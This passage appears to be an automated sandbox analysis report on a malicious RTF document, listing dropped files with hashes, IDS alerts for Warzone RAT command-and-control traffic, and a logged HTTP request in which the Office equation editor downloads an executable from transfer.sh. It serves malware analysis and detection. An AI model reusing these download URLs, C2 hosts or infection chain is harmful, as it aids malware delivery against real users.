                                    Preview:.705m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e....aboZf`Z\V.v...`ZYaZCV.v.j^YV.}.lZAU.w.`Z\^.q.iY.T.}.m^.q.[WlT.}....i.W.y.R.}.^.y.W.q.......XW..Mc.....\7!.K.y.a..`.....Z...Jo.......\GB.Gg.u......X.B.Kg.v......Pp..Nd.w.....\...Ke.}.....Y...Ko.p......G8.u....0<..480fP.401Y7a^?X580..D;.g.....A4...Tgn.`...G.X0P0.80..3cg.a.p0..D.`...igen.a..@.b.e.kX.013^3gR7]804p.F8.a.c..q.ad.G<n.`..D2..qb.e...knj..o.00`...)ecXg`Z]^.q.iYXk^OV.}.lZPU.w.`ZE^.q.iY]T.}.mR.R.t.lT.}._\hR.t...R.}.^.y.W.y.R.u......ZR..Jo....\5$.O
                                    Process:C:\Users\user\AppData\Roaming\word.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):121177
                                    Entropy (8bit):7.975990257791414
                                    Encrypted:false
                                    SSDEEP:3072:o4e/3Kv901euX2EhXGlsO7kjkzRs9Al4T8ouGa2v6ZMzes4BN:oz/3KrTs6Nu6Ies4n
                                    MD5:3B3A3C1AF764E349BA2211D7A3E5BC8B
                                    SHA1:E1AF5B02D2491482D12BAE4ABB289C0975C6BDA4
                                    SHA-256:9F88DF0D1929EEF5FA8DD2E1B543BE7F20E400E61283FFD6479A57465CECA3EF
                                    SHA-512:8F364AABE65D9F2B310C8D0924904B4276CE510CC39CD6E5BF819349A98EA7C8B3DF8DA59082C210732DA0E80E781F2BE3296416DD141718CF3795E017B7C801
                                    Malicious:false
                                    Preview:9g...p]*..O..\u#P.i.l.Y.O...h=F....O..../..S.K*.....,.G1.u0...tD7...$....5.....3g.........F....L...o.%.t...8'7...y.P.<.4..i....f...v.Ce ..s...3Ts....^...,k....yD~.z.nG..y...l...I.jX.L.L...>..0G.;I.xN.........*..$0c0 .G..R..e..A.x.d..fb..F@Rj..[..=..|p]*.O...u#3ti.6...A....h=F...Q.:.#.|..@.S..*.....^.G1Y60..py.7.*...>.X.+l..._.S.Rxe/}ti.X..uY,.>7mg9.../..`ZyFP..<..G.].f{`..~M+.{FFB..F_..[.......uC.0b.>.>.. .S)!....u.b.6hI..h...r.@....A.)_..D.naJ.^U..^.{9...V..Q...!MT*.......RF@Rj..[..=..|p]*a....u#T^.l.Y..G..F=F....O..../....x.I4...QnG1Y.......7..*.p.;.XR+F.._f...../}t.c....Y,e.>..|...Y./..`Zy.P..<9..>f{`..~M+..F.Y...r.....Q....uCT0b..T..<..S|....6.....4...h...r.@....z.)...[DnaJ.^M..^..9....V..Q...!l~*........F@Rj..[..=..|p]*.O...u#..i.l.Y.....h=F....O..../..S.K*.....,.G1YG0.....7..*.p.;.XR+F..._....xe/}ti+..wuY,.>.m....Y./..`Zy.P.<..G.]Tf{`..~M+.{F.U...e_....Q....uC.0b.>.>.. .S)}.......0..4hI..h...r.@....A.)_..D.naJ.^U..^.{9...V..Q
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:57 2022, mtime=Tue Mar 8 15:45:57 2022, atime=Sat Jan 14 02:10:16 2023, length=3352, window=hide
                                    Category:dropped
                                    Size (bytes):1029
                                    Entropy (8bit):4.534583326289771
                                    Encrypted:false
                                    SSDEEP:12:8Ne63gXg/XAlCPCHaXNBQtB/SxXX+WQeWY5ie4icvbZ9J4bDtZ3YilMMEpxRljK1:8Qo/XT9SU1WZQen+Dv3qwtiu7D
                                    MD5:C24FDEC2DCBBF3B50325A0E3E3A06A3E
                                    SHA1:559783AE4324263BAF67FDD90E4A5C0B5064F023
                                    SHA-256:3C8ABE7D190B82A988617906BAC3E4A430B766A84041EA698B826396F3C61E10
                                    SHA-512:0070699668D138BEEAD10A705A88BEF67DF850FA7EDD782380F423A82EE845F23D60207F2EE6E0794FAF3C25313638305C11D6FEEFC2491B1E5D936CBDA7BB8E
                                    Malicious:false
                                    Preview:L..................F.... ...L. ..3..L. ..3.....'...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....l.2......VI. .RFQ-BT~1.DOC..P......hT..hT..*...r.....'...............R.F.Q.-.B.T.5.0.0.4.4.2.3...d.o.c.......{...............-...8...[............?J......C:\Users\..#...................\\506013\Users.user\Desktop\RFQ-BT5004423.doc.(.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.F.Q.-.B.T.5.0.0.4.4.2.3...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......506013..........D_....3N...W...9G..N..... .....[D_....3
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:Generic INItialization configuration [doc]
                                    Category:dropped
                                    Size (bytes):77
                                    Entropy (8bit):4.8102283859102135
                                    Encrypted:false
                                    SSDEEP:3:bDuMJlvU0d6YCmX1FS0d6YCv:bCkpAYjTAYs
                                    MD5:ACC02CEAC116BEBC3560B0DA636C503C
                                    SHA1:A67B1F2E435A50E3483E46C3D909AEC9240E40F3
                                    SHA-256:A60BA23E92CCA678CD3F2FD34B9CFA5F2424234A2D17A05FEB2B633E4AB663A3
                                    SHA-512:8D9130CFCFBB68676607FB9B036EA10BBF0F216D59EF5C9EC28B14FCDB5BC36F16E7A7FBDFFCB5AB6A8BA393E15EF99A9CA263056D914753CE8B85EE27B1DDD2
                                    Malicious:false
                                    Preview:[folders]..Templates.LNK=0..RFQ-BT5004423.LNK=0..[doc]..RFQ-BT5004423.LNK=0..
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):162
                                    Entropy (8bit):2.503835550707525
                                    Encrypted:false
                                    SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
                                    MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
                                    SHA1:23684CCAA587C442181A92E722E15A685B2407B1
                                    SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
                                    SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
                                    Malicious:false
                                    Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
                                    Process:C:\Users\user\AppData\Local\Temp\efwhixxln.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):49152
                                    Entropy (8bit):6.066105853272009
                                    Encrypted:false
                                    SSDEEP:768:BCZPrq5ePvgHTzqapK2ShdCQZsn+Yipkh5eEMP6zED7uXnrjXUeKvvvvvvvv:0pNQaaA1d1s+Yf5dMPturr
                                    MD5:5E067A5FD52C68F0AB1AA8BB9928037D
                                    SHA1:1E70E76F663F1F18BC80E97EAD2D19DD5BD4208C
                                    SHA-256:38D21B3DFE90616A23D9D63775C9C99CA23D79A072D48CEF0A5749F4A7AF4DC4
                                    SHA-512:82800C1625D5D26D195957BEBA977AF56849CD500A8ACACE176D544AAB9AC903EE26D2D186B864AD01FEE4B0C517465E3EC5BAB67235E6F9523E12C7218BB8C7
                                    Malicious:true
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.e.............r...<...r.......................r...m...r.......Rich............................PE..L...,(.c.....................\....................@................................................................................................................. ................................................................................text...(........................... ..`.rdata..v+.......,..................@..@.data...$/..........................@...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                    Category:dropped
                                    Size (bytes):176267
                                    Entropy (8bit):7.823598350208603
                                    Encrypted:false
                                    SSDEEP:3072:XfY/TU9fE9PEtugb65OBqp2yK+kRGrdMbbYnW0JQmtuY8JIEWG8tba8XtE4+pyBP:PYa64CyqA+OGrd0WzzsY8+EDw3dxEyBP
                                    MD5:80158B31173F6E2BC97D5AD1FA9E365F
                                    SHA1:55DD7F373C8124EB14B85BD695037B1785F9EA57
                                    SHA-256:29FF714C2F514B551EC5104304AD932BBFBEE019A818E7662A572E19690FC2C6
                                    SHA-512:51FBA60D5A931FFC16657439FE7AA9E60E2B9294EFB1AD444C162B1D8B6C7E364D0D781CAF351DC9812191EEF60819CC9083B4976376BCA0C3F7151A918AAD7B
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*......@6............@.......................................@..........................................................................................................................................................text...vf.......h.................. ..`.rdata...............l..............@..@.data...x...........................@....ndata...................................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):162
                                    Entropy (8bit):2.503835550707525
                                    Encrypted:false
                                    SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
                                    MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
                                    SHA1:23684CCAA587C442181A92E722E15A685B2407B1
                                    SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
                                    SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
                                    Malicious:false
                                    Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
                                    File type:Rich Text Format data, version 1
                                    Entropy (8bit):4.121110239941442
                                    TrID:
                                    • Rich Text Format (5005/1) 55.56%
                                    • Rich Text Format (4004/1) 44.44%
                                    File name:RFQ-BT5004423.doc
                                    File size:3352
                                    MD5:b257091625b5b040a5808460693b7f9d
                                    SHA1:dccbd982b068faaf1ed0dbcc6e950c45131b971b
                                    SHA256:1e553bc65d767b00782c9bfafe1407516b454d1c45a741e6603c20ce9418b9ff
                                    SHA512:993192957792c5594e31eb9d33df08cc799fa696dc7f682ff16d386386417c6dba5ca0ecc2bd5cc997a92f42bb8d0b3e6536bfafced13ee123cf261a19f38e33
                                    SSDEEP:96:jyrj2PeTYP2w3nXfb40/HC/Ab+km0xiG6F7:W/seTYp3XfU0/HCFUy1
                                    TLSH:D361F67D97881DD4C212B42BE98CBE140183B26A9CCFC88750DCFC040D7F9E09933682
                                    File Content Preview:{\rtf1............{\*\xmltagtype28926189 \$}.{\724403555\object82103225\objocx7919154\objw4691\objh1306{\*\objdata121678{\*\atnicn434496338 \bin00000\.750760669544462497}.{\*\cb965428168 \bin0000000\.599182601789113695}.eda7842d020000000b0000006551 \bin00
                                    Icon Hash:e4eea2aaa4b4b4a4
                                    IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                    000000074hno
                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    192.168.2.22193.42.33.2254917519572852327 01/13/23-19:11:17.153394TCP2852327ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse491751957192.168.2.22193.42.33.225
                                    193.42.33.225192.168.2.221957491752852326 01/13/23-19:13:17.220831TCP2852326ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket195749175193.42.33.225192.168.2.22
                                    192.168.2.22193.42.33.2254917519572852328 01/13/23-19:12:57.200600TCP2852328ETPRO TROJAN Ave Maria/Warzone RAT PingResponse491751957192.168.2.22193.42.33.225
                                    193.42.33.225192.168.2.221957491752852329 01/13/23-19:12:57.200262TCP2852329ETPRO TROJAN Ave Maria/Warzone RAT PingCommand195749175193.42.33.225192.168.2.22
                                    192.168.2.22193.42.33.2254917519572036734 01/13/23-19:13:17.468300TCP2036734ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin491751957192.168.2.22193.42.33.225
                                    193.42.33.225192.168.2.221957491752036735 01/13/23-19:11:17.149432TCP2036735ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound)195749175193.42.33.225192.168.2.22
                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 13, 2023 19:11:10.041497946 CET4917380192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:10.084063053 CET8049173144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:10.084255934 CET4917380192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:10.085311890 CET4917380192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:10.128484964 CET8049173144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:10.128547907 CET8049173144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:10.128714085 CET4917380192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:10.232311010 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:10.232362032 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:10.232425928 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:10.270051003 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:10.270092010 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:10.456171036 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:10.456434965 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:10.470973015 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:10.471014023 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:10.471652031 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:10.471769094 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:10.878644943 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:10.878720045 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.400253057 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.400346994 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.400434017 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.400454044 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.400561094 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.400571108 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.400671005 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.408596992 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.459003925 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.459072113 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.459305048 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.459331989 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.459398985 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.459547043 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.522025108 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.522104025 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.522303104 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.522336006 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.522402048 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.522603035 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.610023022 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.610091925 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.610176086 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.610207081 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.610224962 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.610244989 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.614948988 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.676809072 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.676912069 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.677040100 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.677069902 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.677084923 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.677109957 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.677385092 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.742917061 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.743041992 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.743144035 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.743179083 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.743197918 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.743230104 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.743364096 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.804029942 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.804131985 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.804229021 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.804302931 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.804366112 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.804366112 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.804795980 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.866997004 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.867070913 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.867225885 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.867257118 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.867310047 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.867535114 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.932473898 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.932583094 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.932586908 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.932615042 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:11.932647943 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.932662010 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:11.937912941 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:12.019385099 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:12.019454002 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:12.019694090 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:12.019752979 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:12.019844055 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:12.024138927 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:12.063031912 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:12.063096046 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:12.063220024 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:12.063246965 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:12.063278913 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:12.063633919 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:12.064745903 CET49174443192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:12.064785004 CET44349174144.76.136.153192.168.2.22
                                    Jan 13, 2023 19:11:13.795466900 CET4917380192.168.2.22144.76.136.153
                                    Jan 13, 2023 19:11:17.083431005 CET491751957192.168.2.22193.42.33.225
                                    Jan 13, 2023 19:11:17.115576029 CET195749175193.42.33.225192.168.2.22
                                    Jan 13, 2023 19:11:17.115677118 CET491751957192.168.2.22193.42.33.225
                                    Jan 13, 2023 19:11:17.149431944 CET195749175193.42.33.225192.168.2.22
                                    Jan 13, 2023 19:11:17.153393984 CET491751957192.168.2.22193.42.33.225
                                    Jan 13, 2023 19:11:17.221509933 CET195749175193.42.33.225192.168.2.22
                                    Jan 13, 2023 19:11:17.221632957 CET491751957192.168.2.22193.42.33.225
                                    Jan 13, 2023 19:11:17.322942019 CET195749175193.42.33.225192.168.2.22
                                    Jan 13, 2023 19:11:37.140368938 CET195749175193.42.33.225192.168.2.22
                                    Jan 13, 2023 19:11:37.140825033 CET491751957192.168.2.22193.42.33.225
                                    Jan 13, 2023 19:11:37.215708971 CET195749175193.42.33.225192.168.2.22
                                    Jan 13, 2023 19:11:57.158129930 CET195749175193.42.33.225192.168.2.22
                                    Jan 13, 2023 19:11:57.315304995 CET491751957192.168.2.22193.42.33.225
                                    Jan 13, 2023 19:11:57.387079000 CET195749175193.42.33.225192.168.2.22
                                    Jan 13, 2023 19:12:17.179599047 CET195749175193.42.33.225192.168.2.22
                                    Jan 13, 2023 19:12:17.264868021 CET491751957192.168.2.22193.42.33.225
                                    Jan 13, 2023 19:12:17.344567060 CET195749175193.42.33.225192.168.2.22
                                    Jan 13, 2023 19:12:37.182285070 CET195749175193.42.33.225192.168.2.22
                                    Jan 13, 2023 19:12:37.183706999 CET491751957192.168.2.22193.42.33.225
                                    Jan 13, 2023 19:12:37.267859936 CET195749175193.42.33.225192.168.2.22
                                    Jan 13, 2023 19:12:57.200262070 CET195749175193.42.33.225192.168.2.22
                                    Jan 13, 2023 19:12:57.200599909 CET491751957192.168.2.22193.42.33.225
                                    Jan 13, 2023 19:12:57.281718969 CET195749175193.42.33.225192.168.2.22
                                    Jan 13, 2023 19:13:17.220830917 CET195749175193.42.33.225192.168.2.22
                                    Jan 13, 2023 19:13:17.428610086 CET491751957192.168.2.22193.42.33.225
                                    Jan 13, 2023 19:13:17.468300104 CET491751957192.168.2.22193.42.33.225
                                    Jan 13, 2023 19:13:17.535965919 CET195749175193.42.33.225192.168.2.22
                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 13, 2023 19:11:10.005229950 CET5586853192.168.2.228.8.8.8
                                    Jan 13, 2023 19:11:10.022761106 CET53558688.8.8.8192.168.2.22
                                    Jan 13, 2023 19:11:16.972160101 CET4968853192.168.2.228.8.8.8
                                    Jan 13, 2023 19:11:17.079406977 CET53496888.8.8.8192.168.2.22
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Jan 13, 2023 19:11:10.005229950 CET192.168.2.228.8.8.80x8eefStandard query (0)transfer.shA (IP address)IN (0x0001)false
                                    Jan 13, 2023 19:11:16.972160101 CET192.168.2.228.8.8.80x8cc7Standard query (0)value747.duckdns.orgA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Jan 13, 2023 19:11:10.022761106 CET8.8.8.8192.168.2.220x8eefNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)false
                                    Jan 13, 2023 19:11:17.079406977 CET8.8.8.8192.168.2.220x8cc7No error (0)value747.duckdns.org193.42.33.225A (IP address)IN (0x0001)false
                                    • transfer.sh
                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.2249174144.76.136.153443C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.2249173144.76.136.15380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                    TimestampkBytes transferredDirectionData
                                    Jan 13, 2023 19:11:10.085311890 CET0OUTGET /get/mGCQGV/gstallabt4.2.exe HTTP/1.1
                                    Accept: */*
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Host: transfer.sh
                                    Connection: Keep-Alive
                                    Jan 13, 2023 19:11:10.128547907 CET1INHTTP/1.1 301 Moved Permanently
                                    Server: nginx/1.18.0
                                    Date: Fri, 13 Jan 2023 18:11:10 GMT
                                    Content-Type: text/html
                                    Content-Length: 169
                                    Connection: keep-alive
                                    Location: https://transfer.sh/get/mGCQGV/gstallabt4.2.exe
                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.2249174144.76.136.153443C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                    TimestampkBytes transferredDirectionData
                                    2023-01-13 18:11:10 UTC0OUTGET /get/mGCQGV/gstallabt4.2.exe HTTP/1.1
                                    Accept: */*
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Connection: Keep-Alive
                                    Host: transfer.sh
                                    2023-01-13 18:11:11 UTC0INHTTP/1.1 200 OK
                                    Server: nginx/1.18.0
                                    Date: Fri, 13 Jan 2023 18:11:11 GMT
                                    Content-Type: application/x-ms-dos-executable
                                    Content-Length: 176267
                                    Connection: close
                                    Cache-Control: no-store
                                    Content-Disposition: attachment; filename="gstallabt4.2.exe"
                                    Retry-After: Fri, 13 Jan 2023 19:11:12 GMT
                                    X-Made-With: <3 by DutchCoders
                                    X-Ratelimit-Key: 127.0.0.1,84.17.52.47,84.17.52.47
                                    X-Ratelimit-Limit: 10
                                    X-Ratelimit-Rate: 600
                                    X-Ratelimit-Remaining: 9
                                    X-Ratelimit-Reset: 1673633472
                                    X-Remaining-Days: n/a
                                    X-Remaining-Downloads: n/a
                                    X-Served-By: Proudly served by DutchCoders
                                    Strict-Transport-Security: max-age=63072000
